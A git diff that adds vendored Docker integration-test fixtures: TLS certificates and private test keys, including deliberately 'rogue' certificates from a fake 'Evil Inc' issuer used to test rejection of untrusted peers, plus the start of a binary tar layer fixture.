new file mode 100644
index 0000000000..b5c15f8dc7
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem
@@ -0,0 +1,16 @@
+-----BEGIN PRIVATE KEY-----
+MIICdQIBADANBgkqhkiG9w0BAQEFAASCAl8wggJbAgEAAoGBAMrJBdAJTj6k/NUU
+9KXoNNNrUePzYuqh8OjtxCq88E/KB9/jiPr0IZk1Dj3qsIbnxNKKgytCuOyjmWJw
+gUbM/KUd0mPo6wclmuIlbRFW8hpRobY+HFcy6XssqhvMly2JLbHJXjUoTXz6ZTE+
+93Ddbgs8WK+oLiTAfk54fQqej0JDAgMBAAECgYBOFEzKp2qbMEexe9ofL2N3rDDh
+xkrl8OijpzkLA6i78BxMFn4dsnZlWUpciMrjhsYAExkiRRSS+QMMJimAq1jzQqc3
+FAQV2XGYwkd0cUn7iZGvfNnEPysjsfyYQM+m+sT0ATj4BZjVShC6kkSjTdm1leLN
+OSvcHdcu3Xxg9ufF0QJBAPYdnNt5sIndt2WECePuRVi+uF4mlxTobFY0fjn26yhC
+4RsnhhD3Vldygo9gvnkwrAZYaALGSPBewes2InxvjA8CQQDS7erKiNXpwoqz5XiU
+SVEsIIVTdWzBjGbIqMOu/hUwM5FK4j6JTBks0aTGMyh0YV9L1EzM0X79J29JahCe
+iQKNAkBKNMOGqTpBV0hko1sYDk96YobUXG5RL4L6uvkUIQ7mJMQam+AgXXL7Ctuy
+v0iu4a38e8tgisiTMP7nHHtpaXihAkAOiN54/lzfMsykANgCP9scE1GcoqbP34Dl
+qttxH4kOPT9xzY1JoLjLYdbc4YGUI3GRpBt2sajygNkmUey7P+2xAkBBsVCZFvTw
+qHvOpPS2kX5ml5xoc/QAHK9N7kR+X7XFYx82RTVSqJEK4lPb+aEWn+CjiIewO4Q5
+ksDFuNxAzbhl
+-----END PRIVATE KEY-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-cert.pem
new file mode 100644
index 0000000000..21ae4bd579
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-cert.pem
@@ -0,0 +1,73 @@
+Certificate:
+    Data:
+        Version: 3 (0x2)
+        Serial Number: 2 (0x2)
+    Signature Algorithm: sha1WithRSAEncryption
+        Issuer: C=US, ST=CA, L=SanFrancisco, O=Evil Inc, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain
+        Validity
+            Not Before: Feb 24 17:54:59 2014 GMT
+            Not After : Feb 22 17:54:59 2024 GMT
+        Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=client/name=changeme/emailAddress=mail@host.domain
+        Subject Public Key Info:
+            Public Key Algorithm: rsaEncryption
+                Public-Key: (1024 bit)
+                Modulus:
+                    00:e8:e2:2c:b8:d4:db:89:50:4f:47:1e:68:db:f7:
+                    e4:cc:47:41:63:75:03:37:50:7a:a8:4d:27:36:d5:
+                    15:01:08:b6:cf:56:f7:56:6d:3d:f9:e2:8d:1a:5d:
+                    bf:a0:24:5e:07:55:8e:d0:dc:f1:fa:19:87:1d:d6:
+                    b6:58:82:2e:ba:69:6d:e9:d9:c8:16:0d:1d:59:7f:
+                    f4:8e:58:10:01:3d:21:14:16:3c:ec:cd:8c:b7:0e:
+                    e6:7b:77:b4:f9:90:a5:17:01:bb:84:c6:b2:12:87:
+                    70:eb:9f:6d:4f:d0:68:8b:96:c0:e7:0b:51:b4:9d:
+                    1d:7b:6c:7b:be:89:6b:88:8b
+                Exponent: 65537 (0x10001)
+        X509v3 extensions:
+            X509v3 Basic Constraints: 
+                CA:FALSE
+            Netscape Comment: 
+                Easy-RSA Generated Certificate
+            X509v3 Subject Key Identifier: 
+                9E:F8:49:D0:A2:76:30:5C:AB:2B:8A:B5:8D:C6:45:1F:A7:F8:CF:85
+            X509v3 Authority Key Identifier: 
+                keyid:DC:A5:F1:76:DB:4E:CD:8E:EF:B1:23:56:1D:92:80:99:74:3B:EA:6F
+                DirName:/C=US/ST=CA/L=SanFrancisco/O=Evil Inc/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain
+                serial:E7:21:1E:18:41:1B:96:83
+
+            X509v3 Extended Key Usage: 
+                TLS Web Client Authentication
+            X509v3 Key Usage: 
+                Digital Signature
+    Signature Algorithm: sha1WithRSAEncryption
+         48:76:c0:18:fa:0a:ee:4e:1a:ec:02:9d:d4:83:ca:94:54:a1:
+         3f:51:2f:3e:4b:95:c3:42:9b:71:a0:4b:d9:af:47:23:b9:1c:
+         fb:85:ba:76:e2:09:cb:65:bb:d2:7d:44:3d:4b:67:ba:80:83:
+         be:a8:ed:c4:b9:ea:1a:1b:c7:59:3b:d9:5c:0d:46:d8:c9:92:
+         cb:10:c5:f2:1a:38:a4:aa:07:2c:e3:84:16:79:c7:95:09:e3:
+         01:d2:15:a2:77:0b:8b:bf:94:04:e9:7f:c0:cd:e6:2e:64:cd:
+         1e:a3:32:ec:11:cc:62:ce:c7:4e:cd:ad:48:5c:b1:b8:e9:76:
+         b3:f9
+-----BEGIN CERTIFICATE-----
+MIIEDTCCA3agAwIBAgIBAjANBgkqhkiG9w0BAQUFADCBnjELMAkGA1UEBhMCVVMx
+CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xETAPBgNVBAoTCEV2
+aWwgSW5jMREwDwYDVQQLEwhjaGFuZ2VtZTERMA8GA1UEAxMIY2hhbmdlbWUxETAP
+BgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWlsQGhvc3QuZG9tYWlu
+MB4XDTE0MDIyNDE3NTQ1OVoXDTI0MDIyMjE3NTQ1OVowgaAxCzAJBgNVBAYTAlVT
+MQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxG
+b3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMQ8wDQYDVQQDEwZjbGllbnQx
+ETAPBgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWlsQGhvc3QuZG9t
+YWluMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDo4iy41NuJUE9HHmjb9+TM
+R0FjdQM3UHqoTSc21RUBCLbPVvdWbT354o0aXb+gJF4HVY7Q3PH6GYcd1rZYgi66
+aW3p2cgWDR1Zf/SOWBABPSEUFjzszYy3DuZ7d7T5kKUXAbuExrISh3Drn21P0GiL
+lsDnC1G0nR17bHu+iWuIiwIDAQABo4IBVTCCAVEwCQYDVR0TBAIwADAtBglghkgB
+hvhCAQ0EIBYeRWFzeS1SU0EgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0GA1UdDgQW
+BBSe+EnQonYwXKsrirWNxkUfp/jPhTCB0wYDVR0jBIHLMIHIgBTcpfF2207Nju+x
+I1YdkoCZdDvqb6GBpKSBoTCBnjELMAkGA1UEBhMCVVMxCzAJBgNVBAgTAkNBMRUw
+EwYDVQQHEwxTYW5GcmFuY2lzY28xETAPBgNVBAoTCEV2aWwgSW5jMREwDwYDVQQL
+EwhjaGFuZ2VtZTERMA8GA1UEAxMIY2hhbmdlbWUxETAPBgNVBCkTCGNoYW5nZW1l
+MR8wHQYJKoZIhvcNAQkBFhBtYWlsQGhvc3QuZG9tYWluggkA5yEeGEEbloMwEwYD
+VR0lBAwwCgYIKwYBBQUHAwIwCwYDVR0PBAQDAgeAMA0GCSqGSIb3DQEBBQUAA4GB
+AEh2wBj6Cu5OGuwCndSDypRUoT9RLz5LlcNCm3GgS9mvRyO5HPuFunbiCctlu9J9
+RD1LZ7qAg76o7cS56hobx1k72VwNRtjJkssQxfIaOKSqByzjhBZ5x5UJ4wHSFaJ3
+C4u/lATpf8DN5i5kzR6jMuwRzGLOx07NrUhcsbjpdrP5
+-----END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-key.pem
new file mode 100644
index 0000000000..53c122ab70
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-key.pem
@@ -0,0 +1,16 @@
+-----BEGIN PRIVATE KEY-----
+MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBAOjiLLjU24lQT0ce
+aNv35MxHQWN1AzdQeqhNJzbVFQEIts9W91ZtPfnijRpdv6AkXgdVjtDc8foZhx3W
+tliCLrppbenZyBYNHVl/9I5YEAE9IRQWPOzNjLcO5nt3tPmQpRcBu4TGshKHcOuf
+bU/QaIuWwOcLUbSdHXtse76Ja4iLAgMBAAECgYADs+TmI2xCKKa6CL++D5jxrohZ
+nnionnz0xBVFh+nHlG3jqgxQsXf0yydXLfpn/2wHTdLxezHVuiYt0UYg7iD0CglW
++IjcgMebzyjLeYqYOE5llPlMvhp2HoEMYJNb+7bRrZ1WCITbu+Su0w1cgA7Cs+Ej
+VlfvGzN+qqnDThRUYQJBAPY0sMWZJKly8QhUmUvmcXdPczzSOf6Mm7gc5LR6wzxd
+vW7syuqk50qjqVqFpN81vCV7GoDxRUWbTM9ftf7JGFkCQQDyJc/1RMygE2o+enU1
+6UBxJyclXITEYtDn8aoEpLNc7RakP1WoPUKjZOnjkcoKcIkFNkSPeCfQujrb5f3F
+MkuDAkByAI/hzzmkpK5rFxEsjfX4Mve/L/DepyjrpaVY1IdWimlO1aJX6CeY7hNa
+8QsYt/74s/nfvtg+lNyKIV1aLq9xAkB+WSSNgfyTeg3x08vc+Xxajmdqoz/TiQwg
+OoTQL3A3iK5LvZBgXLasszcnOycFE3srcQmNItEDpGiZ3QPxJTEpAkEA45EE9NMJ
+SA7EGWSFlbz4f4u4oBeiDiJRJbGGfAyVxZlpCWUjPpg9+swsWoFEOjnGYaChAMk5
+nrOdMf15T6QF7Q==
+-----END PRIVATE KEY-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem
new file mode 100644
index 0000000000..08abfd1a3b
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem
@@ -0,0 +1,76 @@
+Certificate:
+    Data:
+        Version: 3 (0x2)
+        Serial Number: 4 (0x4)
+    Signature Algorithm: sha1WithRSAEncryption
+        Issuer: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain
+        Validity
+            Not Before: Dec  4 15:01:20 2013 GMT
+            Not After : Dec  2 15:01:20 2023 GMT
+        Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=*/name=changeme/emailAddress=mail@host.domain
+        Subject Public Key Info:
+            Public Key Algorithm: rsaEncryption
+                Public-Key: (1024 bit)
+                Modulus:
+                    00:c1:ff:7d:30:6f:64:4a:b1:92:b1:71:d1:c1:74:
+                    e2:1d:db:2d:11:24:e1:00:d4:00:ae:6f:c8:9e:ae:
+                    67:b3:4a:bd:f7:e6:9e:57:6d:19:4c:3c:23:94:2d:
+                    3d:d6:63:84:d8:fa:76:2b:38:12:c1:ed:20:9d:32:
+                    e0:e8:c2:bf:9a:77:70:04:3f:7f:ca:8c:2c:82:d6:
+                    3d:25:5c:02:1a:4f:64:93:03:dd:9c:42:97:5e:09:
+                    49:af:f0:c2:e1:30:08:0e:21:46:95:d1:13:59:c0:
+                    c8:76:be:94:0d:8b:43:67:21:33:b2:08:60:9d:76:
+                    a8:05:32:1e:f9:95:09:14:75
+                Exponent: 65537 (0x10001)
+        X509v3 extensions:
+            X509v3 Basic Constraints: 
+                CA:FALSE
+            Netscape Cert Type: 
+                SSL Server
+            Netscape Comment: 
+                Easy-RSA Generated Server Certificate
+            X509v3 Subject Key Identifier: 
+                14:02:FD:FD:DD:13:38:E0:71:EA:D1:BE:C0:0E:89:1A:2D:B6:19:06
+            X509v3 Authority Key Identifier: 
+                keyid:66:EE:C3:17:3D:3D:AB:44:01:6B:6F:B2:99:19:BD:AA:02:B5:34:FB
+                DirName:/C=US/ST=CA/L=SanFrancisco/O=Fort-Funston/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain
+                serial:FD:AB:EC:6A:84:27:04:A7
+
+            X509v3 Extended Key Usage: 
+                TLS Web Server Authentication
+            X509v3 Key Usage: 
+                Digital Signature, Key Encipherment
+    Signature Algorithm: sha1WithRSAEncryption
+         40:0f:10:39:c4:b7:0f:0d:2f:bf:d2:16:cc:8e:d3:9a:fb:8b:
+         ce:4b:7b:0d:48:77:ce:f1:fe:d5:8f:ea:b1:71:ed:49:1d:9f:
+         23:3a:16:d4:70:7c:c5:29:bf:e4:90:34:d0:f0:00:24:f4:e4:
+         df:2c:c3:83:01:66:61:c9:a8:ab:29:e7:98:6d:27:89:4a:76:
+         c9:2e:19:8e:fe:6e:d5:f8:99:11:0e:97:67:4b:34:e3:1e:e3:
+         9f:35:00:a5:32:f9:b5:2c:f2:e0:c5:2e:cc:81:bd:18:dd:5c:
+         12:c8:6b:fa:0c:17:74:30:55:f6:6e:20:9a:6c:1e:09:b4:0c:
+         15:42
+-----BEGIN CERTIFICATE-----
+MIIEKjCCA5OgAwIBAgIBBDANBgkqhkiG9w0BAQUFADCBojELMAkGA1UEBhMCVVMx
+CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xFTATBgNVBAoTDEZv
+cnQtRnVuc3RvbjERMA8GA1UECxMIY2hhbmdlbWUxETAPBgNVBAMTCGNoYW5nZW1l
+MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0LmRv
+bWFpbjAeFw0xMzEyMDQxNTAxMjBaFw0yMzEyMDIxNTAxMjBaMIGbMQswCQYDVQQG
+EwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMGA1UE
+ChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTEKMAgGA1UEAxQBKjER
+MA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21h
+aW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMH/fTBvZEqxkrFx0cF04h3b
+LREk4QDUAK5vyJ6uZ7NKvffmnldtGUw8I5QtPdZjhNj6dis4EsHtIJ0y4OjCv5p3
+cAQ/f8qMLILWPSVcAhpPZJMD3ZxCl14JSa/wwuEwCA4hRpXRE1nAyHa+lA2LQ2ch
+M7IIYJ12qAUyHvmVCRR1AgMBAAGjggFzMIIBbzAJBgNVHRMEAjAAMBEGCWCGSAGG
++EIBAQQEAwIGQDA0BglghkgBhvhCAQ0EJxYlRWFzeS1SU0EgR2VuZXJhdGVkIFNl
+cnZlciBDZXJ0aWZpY2F0ZTAdBgNVHQ4EFgQUFAL9/d0TOOBx6tG+wA6JGi22GQYw
+gdcGA1UdIwSBzzCBzIAUZu7DFz09q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJ
+BgNVBAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUw
+EwYDVQQKEwxGb3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQD
+EwhjaGFuZ2VtZTERMA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1h
+aWxAaG9zdC5kb21haW6CCQD9q+xqhCcEpzATBgNVHSUEDDAKBggrBgEFBQcDATAL
+BgNVHQ8EBAMCBaAwDQYJKoZIhvcNAQEFBQADgYEAQA8QOcS3Dw0vv9IWzI7TmvuL
+zkt7DUh3zvH+1Y/qsXHtSR2fIzoW1HB8xSm/5JA00PAAJPTk3yzDgwFmYcmoqynn
+mG0niUp2yS4Zjv5u1fiZEQ6XZ0s04x7jnzUApTL5tSzy4MUuzIG9GN1cEshr+gwX
+dDBV9m4gmmweCbQMFUI=
+-----END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem
new file mode 100644
index 0000000000..c269320ef0
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem
@@ -0,0 +1,16 @@
+-----BEGIN PRIVATE KEY-----
+MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBAMH/fTBvZEqxkrFx
+0cF04h3bLREk4QDUAK5vyJ6uZ7NKvffmnldtGUw8I5QtPdZjhNj6dis4EsHtIJ0y
+4OjCv5p3cAQ/f8qMLILWPSVcAhpPZJMD3ZxCl14JSa/wwuEwCA4hRpXRE1nAyHa+
+lA2LQ2chM7IIYJ12qAUyHvmVCRR1AgMBAAECgYAmwckb9RUfSwyYgLm8IYLPHiuJ
+wkllZfVg5Bo7gXJcQnFjZmJ56uTj8xvUjZlODIHM63TSO5ibv6kFXtXKCqZGd2M+
+wGbhZ0f+2GvKcwMmJERnIQjuoNaYSQLT0tM0VB9Iz0rJlZC+tzPZ+5pPqEumRdsS
+IzWNXfF42AhcbwAQYQJBAPVXtMYIJc9EZsz86ZcQiMPWUpCX5vnRmtwL8kKyR8D5
+4KfYeiowyFffSRMMcclwNHq7TgSXN+nIXM9WyzyzwikCQQDKbNA28AgZp9aT54HP
+WnbeE2pmt+uk/zl/BtxJSoK6H+69Jec+lf7EgL7HgOWYRSNot4uQWu8IhsHLTiUq
++0FtAkEAqwlRxRy4/x24bP+D+QRV0/D97j93joFJbE4Hved7jlSlAV4xDGilwlyv
+HNB4Iu5OJ6Gcaibhm+FKkmD3noHSwQJBAIpu3fokLzX0bS+bDFBU6qO3HXX/47xj
++tsfQvkwZrSI8AkU6c8IX0HdVhsz0FBRQAT2ORDQz1XCarfxykNZrwUCQQCGCBIc
+BBCWzhHlswlGidWJg3HqqO6hPPClEr3B5G87oCsdeYwiO23XT6rUnoJXfJHp6oCW
+5nCwDu5ZTP+khltg
+-----END PRIVATE KEY-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-cert.pem
new file mode 100644
index 0000000000..28feba6656
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-cert.pem
@@ -0,0 +1,76 @@
+Certificate:
+    Data:
+        Version: 3 (0x2)
+        Serial Number: 3 (0x3)
+    Signature Algorithm: sha1WithRSAEncryption
+        Issuer: C=US, ST=CA, L=SanFrancisco, O=Evil Inc, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain
+        Validity
+            Not Before: Feb 28 18:49:31 2014 GMT
+            Not After : Feb 26 18:49:31 2024 GMT
+        Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=localhost/name=changeme/emailAddress=mail@host.domain
+        Subject Public Key Info:
+            Public Key Algorithm: rsaEncryption
+                Public-Key: (1024 bit)
+                Modulus:
+                    00:d1:08:58:24:60:a1:69:65:4b:76:46:8f:88:75:
+                    7c:49:3a:d8:03:cc:5b:58:c5:d1:bb:e5:f9:54:b9:
+                    75:65:df:7e:bb:fb:54:d4:b2:e9:6f:58:a2:a4:84:
+                    43:94:77:24:81:38:36:36:f0:66:65:26:e5:5b:2a:
+                    14:1c:a9:ae:57:7f:75:00:23:14:4b:61:58:e4:82:
+                    aa:15:97:94:bd:50:35:0d:5d:18:18:ed:10:6a:bb:
+                    d3:64:5a:eb:36:98:5b:58:a7:fe:67:48:c1:6c:3f:
+                    51:2f:02:65:96:54:77:9b:34:f9:a7:d2:63:54:6a:
+                    9e:02:5c:be:65:98:a4:b4:b5
+                Exponent: 65537 (0x10001)
+        X509v3 extensions:
+            X509v3 Basic Constraints: 
+                CA:FALSE
+            Netscape Cert Type: 
+                SSL Server
+            Netscape Comment: 
+                Easy-RSA Generated Server Certificate
+            X509v3 Subject Key Identifier: 
+                1F:E0:57:CA:CB:76:C9:C4:86:B9:EA:69:17:C0:F3:51:CE:95:40:EC
+            X509v3 Authority Key Identifier: 
+                keyid:DC:A5:F1:76:DB:4E:CD:8E:EF:B1:23:56:1D:92:80:99:74:3B:EA:6F
+                DirName:/C=US/ST=CA/L=SanFrancisco/O=Evil Inc/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain
+                serial:E7:21:1E:18:41:1B:96:83
+
+            X509v3 Extended Key Usage: 
+                TLS Web Server Authentication
+            X509v3 Key Usage: 
+                Digital Signature, Key Encipherment
+    Signature Algorithm: sha1WithRSAEncryption
+         04:93:0e:28:01:94:18:f0:8c:7c:d3:0c:ad:e9:b7:46:b1:30:
+         65:ed:68:7c:8c:91:cd:1a:86:66:87:4a:4f:c0:97:bc:f7:85:
+         4b:38:79:31:b2:65:88:b1:76:16:9e:80:93:38:f4:b9:eb:65:
+         00:6d:bb:89:e0:a1:bf:95:5e:80:13:8e:01:73:d3:f1:08:73:
+         85:a5:33:75:0b:42:8a:a3:07:09:35:ef:d7:c6:58:eb:60:a3:
+         06:89:a0:53:99:e2:aa:41:90:e0:1a:d2:12:4b:48:7d:c3:9c:
+         ad:bd:0e:5e:5f:f7:09:0c:5d:7c:86:24:dd:92:d5:b3:14:06:
+         c7:9f
+-----BEGIN CERTIFICATE-----
+MIIEKjCCA5OgAwIBAgIBAzANBgkqhkiG9w0BAQUFADCBnjELMAkGA1UEBhMCVVMx
+CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xETAPBgNVBAoTCEV2
+aWwgSW5jMREwDwYDVQQLEwhjaGFuZ2VtZTERMA8GA1UEAxMIY2hhbmdlbWUxETAP
+BgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWlsQGhvc3QuZG9tYWlu
+MB4XDTE0MDIyODE4NDkzMVoXDTI0MDIyNjE4NDkzMVowgaMxCzAJBgNVBAYTAlVT
+MQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxG
+b3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMRIwEAYDVQQDEwlsb2NhbGhv
+c3QxETAPBgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWlsQGhvc3Qu
+ZG9tYWluMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDRCFgkYKFpZUt2Ro+I
+dXxJOtgDzFtYxdG75flUuXVl3367+1TUsulvWKKkhEOUdySBODY28GZlJuVbKhQc
+qa5Xf3UAIxRLYVjkgqoVl5S9UDUNXRgY7RBqu9NkWus2mFtYp/5nSMFsP1EvAmWW
+VHebNPmn0mNUap4CXL5lmKS0tQIDAQABo4IBbzCCAWswCQYDVR0TBAIwADARBglg
+hkgBhvhCAQEEBAMCBkAwNAYJYIZIAYb4QgENBCcWJUVhc3ktUlNBIEdlbmVyYXRl
+ZCBTZXJ2ZXIgQ2VydGlmaWNhdGUwHQYDVR0OBBYEFB/gV8rLdsnEhrnqaRfA81HO
+lUDsMIHTBgNVHSMEgcswgciAFNyl8XbbTs2O77EjVh2SgJl0O+pvoYGkpIGhMIGe
+MQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNj
+bzERMA8GA1UEChMIRXZpbCBJbmMxETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQD
+EwhjaGFuZ2VtZTERMA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1h
+aWxAaG9zdC5kb21haW6CCQDnIR4YQRuWgzATBgNVHSUEDDAKBggrBgEFBQcDATAL
+BgNVHQ8EBAMCBaAwDQYJKoZIhvcNAQEFBQADgYEABJMOKAGUGPCMfNMMrem3RrEw
+Ze1ofIyRzRqGZodKT8CXvPeFSzh5MbJliLF2Fp6Akzj0uetlAG27ieChv5VegBOO
+AXPT8QhzhaUzdQtCiqMHCTXv18ZY62CjBomgU5niqkGQ4BrSEktIfcOcrb0OXl/3
+CQxdfIYk3ZLVsxQGx58=
+-----END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-key.pem
new file mode 100644
index 0000000000..10f7c65001
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-key.pem
@@ -0,0 +1,16 @@
+-----BEGIN PRIVATE KEY-----
+MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBANEIWCRgoWllS3ZG
+j4h1fEk62APMW1jF0bvl+VS5dWXffrv7VNSy6W9YoqSEQ5R3JIE4NjbwZmUm5Vsq
+FByprld/dQAjFEthWOSCqhWXlL1QNQ1dGBjtEGq702Ra6zaYW1in/mdIwWw/US8C
+ZZZUd5s0+afSY1RqngJcvmWYpLS1AgMBAAECgYAJXh9dGfuB1qlIFqduDR3RxlJR
+8UGSu+LHUeoXkuwg8aAjWoMVuSLe+5DmYIsKx0AajmNXmPRtyg1zRXJ7SltmubJ8
+6qQVDsRk6biMdkpkl6a9Gk2av40psD9/VPGxagEoop7IKYhf3AeKPvPiwVB2qFrl
+1aYMZm0aMR55pgRajQJBAOk8IsJDf0beooDZXVdv/oe4hcbM9fxO8Cn3qzoGImqD
+37LL+PCzDP7AEV3fk43SsZDeSk+LDX+h0o9nPyhzHasCQQDlb3aDgcQY9NaGLUWO
+moOCB3148eBVcAwCocu+OSkf7sbQdvXxgThBOrZl11wwRIMQqh99c2yeUwj+tELl
+3VcfAkBZTiNpCvtDIaBLge9RuZpWUXs3wec2cutWxnSTxSGMc25GQf/R+l0xdk2w
+ChmvpktDUzpU9sN2aXn8WuY+EMX9AkEApbLpUbKPUELLB958RLA819TW/lkZXjrs
+wZ3eSoR3ufM1rOqtVvyvBxUDE+wETWu9iHSFB5Ir2PA5J9JCGkbPmwJAFI1ndfBj
+iuyU93nFX0p+JE2wVHKx4dMzKCearNKiJh/lGDtUq3REGgamTNUnG8RAITUbxFs+
+Z1hrIq8xYl2LOQ==
+-----END PRIVATE KEY-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/load/emptyLayer.tar b/vendor/github.com/docker/docker/integration-cli/fixtures/load/emptyLayer.tar
new file mode 100644
index 0000000000000000000000000000000000000000..beabb569ac1e7fea69848f79ffd77fb17b2487b0
GIT binary patch
literal 30720
zcmeI4ZExeo5y$<ypF&{Yw7^N;*=GtU&};619MHx=&P{<{i^D$JOeE5vs36zFefJLa
z6wA3-%2759cnH`McbB{5Z+6L@5&sJ&f)qMsQ)-ua4x9rEL6{)5;Ym3MUi09YbwT=4
z#Ry6mE;s;FPV4it!yCiRD0S9<;&%6Ql?EJ?mIAcaXN)th<k?6au6lTh<)U-#Xmr*#
zO?O{yhw|?`_6g^~Q2T%X`n$JpF21?%5_<z{Deu~SyN|izY~TJMK%I@)eU+Xn@44H5
z@+g!~Wi6`b!~_P9{~s1jec+r9jDKL7-yQ!T4UPW;SWlAuv8ZA(Erxc3;zbdf`8?Gf
zR`zCo)3jZRque(0(YViRlfwke;|#=@=`n~)kW(h6icKsBqsuWfQ^r;m)t#&A)V>c*
zovW*2`my-BS#-6VC#(TWylUoH;FtY>E>gSBdD(R?T)*vNRTtCjW{dQq*rhc~JiEJz
zsl`J#iI?4n-S>-|RPWcb+PkO&p2Vj7>-wi+S}$j_7sXd|yt?(*H*<HjInnQ%*>av1
z+nj$j?T=M`^{U#O?d!U0Kio7`Pi=kdMg6yBHQQD7cjwb=bNHthMQp;4h~=l$E~*AE
zuwWB8>5;iMTvuHR-Lmal{@LpHT4MUleZcZ73oou6S9)q>^d-k>oX_}Qcxyo^p;T#I
z4yBjEs}MP78A@rGh|&6(B$v4q&IKEaPbcYiRLK(|Fm&Lbue#U-=g_}>K?m>u=o9SE
z|2Wfh|Nm{EC(M}~<G>AUk1=_?|0jAs(MS-F>HlGq1Fv!G%<Mjg*7r!qqoXaAV>u}F
zxq~RdI2NK#f|*#Nn~(V{vFLOO8UqEuV@wWH0lWbP;+XE!kN?B|zvfDCV+{KLI33XJ
zG420+{r|!CKbik8jnddl(C`@lF&t?A{}{IbApid{FhAKg29N*Y{y*OI0q1{v<6mif
z{ttd8A4C0_$Nx6||IluLzUGZ<*Y1BAOz<VJXr++aiR`lof&0Xy&Qki!Ts9dXc^f@X
z8M0KV6ag^opV7(0y7uA)YRoWXATK#gg`Fxr!C(Q$pDVcdcVD#GL<`XGMb9;0RorvO
zQf3yiaUmz1Ot|D+_IO664N`KOBcuR=#gwg1CX`OvtZ!HM`QXFt7O?b_3PijszI}Q5
z^<U1Hi}rlh1UEZh_^O`X+TZQ|lCer!@8Z|uzne(LyW$*o&llHtk>lPXfBaM3-28d;
z^3|(Ru4ZY9j6K(!m62PF7=SBvvY>6u9_MkwI>$<kEJWr?r&CnYl@fb^k7Wr`Y8X}Z
z=)7-k8!b^DurHutlwn$NVVt%?Fj2Y?STb4LBs6vs6|M6aq`>54a7OCT$T3-m=lJE(
zmUnm}hhi;&u@=Bq+_JlF`T)-5bsBwzUH;<j=-amW0i!RY|19yhj1XqcGLD;@#a{zv
zH;YNrUafM{XgqTB>iw#FV;!sB`|AkTbLnLJ;j*XJ0q(@q+&r#AY7K_tidj`Je@64Y
